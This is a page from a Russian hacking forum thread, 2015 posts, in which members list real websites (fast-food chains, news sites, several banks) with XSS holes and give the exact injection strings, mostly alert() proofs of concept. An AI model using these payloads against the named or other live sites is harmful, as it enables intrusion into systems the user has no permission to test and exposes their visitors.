HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Уязвимости SQLi, XSS и другие.
   
Ответ
Страница 18 из 35 « Первая < 8 14 15 16 17 18 19 20 21 22 28 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 30.08.2015, 21:21
DDShadoww
Новичок
Регистрация: 14.07.2015
Сообщений: 11
С нами: 5702006

Репутация: 2
По умолчанию
XSS на мобильной версии сайта KFC

target:m.kfc.ru/career-vacancies/member

type: XSS-Reflected

В поля Фамилия, имя вводим

Код:
">alert("XSS")
и так же в поле Мобильный телефон
 
Ответить с цитированием

  #172  
Старый 30.08.2015, 22:12
DDShadoww
Новичок
Регистрация: 14.07.2015
Сообщений: 11
С нами: 5702006

Репутация: 2
По умолчанию
BurgerKing

target: burgerking.ru

type: XSS-Reflected

В поля поиска

Код:
">alert(1)
 
Ответить с цитированием

  #173  
Старый 02.09.2015, 14:19
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию
Target: _ttp://www.edelws.ru

Type : XSS-Reflected(вбивается под поисковик .)

Код:
">alert("WH")
 
Ответить с цитированием

  #174  
Старый 02.09.2015, 14:38
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию
Цитата:
Сообщение от DDShadoww  

target:3dnews.ru

type: XSS-Reflected
В поля поиска

Код:
alert(1)

это DOM based XSS

работает даже в хроме

Код:
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0
 
Ответить с цитированием

  #175  
Старый 02.09.2015, 14:44
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Цитата:
Сообщение от psihoz26  

это DOM based XSS
работает даже в хроме
Код:
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0
страннло что у меня не работает, может хром старый?
 
Ответить с цитированием

  #176  
Старый 02.09.2015, 15:10
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417383

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  

страннло что у меня не работает, может хром старый?
Введи в поиск и нажми значок поиска alert(1)
 
Ответить с цитированием

  #177  
Старый 07.09.2015, 22:31
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию
Код:
http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
пассивно-активная XSS.

Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.
 
Ответить с цитированием

  #178  
Старый 08.09.2015, 10:02
DDShadoww
Новичок
Регистрация: 14.07.2015
Сообщений: 11
С нами: 5702006

Репутация: 2
По умолчанию
Target: allbanks.ru

Type: Reflected

В поля поиска -

Код:
">alert(1)


Target: capitalbank.kz/oldsite/

Type: Reflected

В поля поиска -

Код:
">alert(1)
Target: asbank.ru/

Type: Reflected

В поля поиска -

Код:
">alert(1)
 
Ответить с цитированием

  #179  
Старый 09.09.2015, 18:30
d3q
Новичок
Регистрация: 06.09.2015
Сообщений: 7
С нами: 5624246

Репутация: 0
По умолчанию
Цитата:
Сообщение от SaNDER  

Target: _ttp://www.edelws.ru
Type : XSS-Reflected(вбивается под поисковик .)

Код:
"<>script>alert("WH")

Видимо опечатка - второй и третий символ надо поменять местами
Код:
">alert("WH")
 
Ответить с цитированием

  #180  
Старый 12.09.2015, 20:53
DDShadoww
Новичок
Регистрация: 14.07.2015
Сообщений: 11
С нами: 5702006

Репутация: 2
По умолчанию
Target: foto7an.se

Type:Reflected and Stored

Весь в XSS. И еше бонус - foto7an.se/files/
 
Ответить с цитированием
Ответ
Страница 18 из 35 « Первая < 8 14 15 16 17 18 19 20 21 22 28 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.